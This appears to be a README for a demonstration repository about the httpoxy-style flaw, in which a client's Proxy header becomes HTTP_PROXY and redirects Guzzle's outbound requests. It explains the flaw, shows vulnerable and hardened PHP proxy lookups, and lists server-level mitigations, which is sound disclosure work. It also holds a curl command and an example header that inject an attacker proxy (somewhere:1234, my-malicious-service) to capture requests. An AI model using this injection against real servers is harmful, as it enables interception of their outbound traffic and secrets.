This is how the vulnerability works:
- Do the usual PHP thing of exposing user-supplied request headers as $_SERVER['HTTP_*'] variables
- Be using Guzzle from an HHVM request handler
- As an HTTP client, inject a
Proxy: my-malicious-service
header into any request made; the CGI naming rule turns it into HTTP_PROXY, the same variable Guzzle reads for its outbound proxy setting
- Watch as Guzzle helpfully sends the request to the malicious proxy, supplied by the client
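As an added illustration of the mechanism above (this is not code from this repo or from Guzzle): the CGI naming rule that maps a Proxy request header onto HTTP_PROXY, a proxy lookup that trusts that variable unconditionally, and the hardened lookup that only honours HTTP_PROXY when PHP runs from the command line, where no client header can have set it. The function names, the sample headers and the 'fpm-fcgi' SAPI string are assumptions made for the example.

```php
<?php
// Added example, not part of this repo or of Guzzle. Names and sample
// values below are constructed for illustration.

// CGI/FastCGI naming rule: request header "Foo-Bar" is exposed to the
// application as HTTP_FOO_BAR. This is what turns a client-supplied
// "Proxy:" header into HTTP_PROXY, the same name a deployer would use
// for a legitimate outbound proxy setting.
function cgiVarName(string $header): string
{
    return 'HTTP_' . strtoupper(str_replace('-', '_', $header));
}

// Build the $_SERVER-style array a PHP app sees for a set of request headers.
function serverVarsFromHeaders(array $headers): array
{
    $server = [];
    foreach ($headers as $name => $value) {
        $server[cgiVarName($name)] = $value;
    }
    return $server;
}

// Vulnerable pattern: honour HTTP_PROXY from the environment regardless of
// how PHP was invoked. Under a web SAPI the value is attacker-controlled,
// so every outbound request made by the app goes through the attacker's host.
function resolveProxyVulnerable(array $server): ?string
{
    return $server['HTTP_PROXY'] ?? null;
}

// Hardened pattern: only trust HTTP_PROXY when running from the CLI. Under a
// web SAPI it is ignored entirely; a deployer who really needs an outbound
// proxy in a web context should use a variable that is not HTTP_-prefixed.
function resolveProxyHardened(array $server, string $sapi): ?string
{
    if ($sapi !== 'cli') {
        return null;
    }
    return $server['HTTP_PROXY'] ?? null;
}

// Constructed request: an ordinary Host header plus the malicious Proxy
// header from the README's curl command.
$headers = [
    'Host'  => 'localhost:8001',
    'Proxy' => 'somewhere:1234',
];
$server = serverVarsFromHeaders($headers);

// 'fpm-fcgi' is an assumed PHP_SAPI value for a FastCGI-hosted request;
// in a real app pass PHP_SAPI instead of a literal.
printf("vulnerable lookup:        %s\n", var_export(resolveProxyVulnerable($server), true));
printf("hardened lookup (fcgi):   %s\n", var_export(resolveProxyHardened($server, 'fpm-fcgi'), true));
printf("hardened lookup (cli):    %s\n", var_export(resolveProxyHardened($server, 'cli'), true));
```

The same fix can be applied one layer up, so the variable never exists inside the PHP process: strip the header before it reaches FastCGI, for example with nginx's fastcgi_param HTTP_PROXY ""; or Apache's RequestHeader unset Proxy early. Doing both is sensible, since the application-level check protects deployments whose web server configuration is outside the developer's control.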
This repo contains a docker-compose setup that puts index.php into an HHVM FastCGI container. To test:
- docker-compose up -d
- curl -vv -H 'Proxy: somewhere:1234' http://localhost:8001/index.php
- collect the reflected request at somewhere:1234